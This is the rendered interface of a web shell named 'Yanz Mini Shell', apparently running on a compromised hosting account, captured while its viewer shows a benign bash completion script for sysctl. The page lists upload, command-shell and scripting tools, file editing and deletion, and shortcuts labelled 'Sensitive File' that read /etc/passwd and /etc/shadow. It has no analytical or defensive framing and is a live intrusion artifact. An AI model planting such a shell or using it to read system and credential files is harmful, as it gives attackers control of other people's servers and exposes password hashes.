Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
hdhubreisen
public_html
gebase
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
# bash completion for sysctl -*- shell-script -*- _sysctl() { local cur prev words cword _init_completion || return case $prev in --help|--version) return ;; -p) _filedir conf return ;; esac if [[ $cur == -* ]]; then local opts="$( _parse_help "$1" )" [[ $opts ]] || opts="$( _parse_usage "$1" )" COMPREPLY=( $( compgen -W "$opts" -- "$cur" ) ) else local suffix= [[ $prev == -w ]] && suffix== COMPREPLY=( $( compgen -S "$suffix" -W \ "$( PATH="$PATH:/sbin" sysctl -N -a 2>/dev/null )" -- "$cur" ) ) [[ $COMPREPLY == *= ]] && compopt -o nospace fi } && complete -F _sysctl sysctl # ex: filetype=sh
Free Space : 62666825728 Byte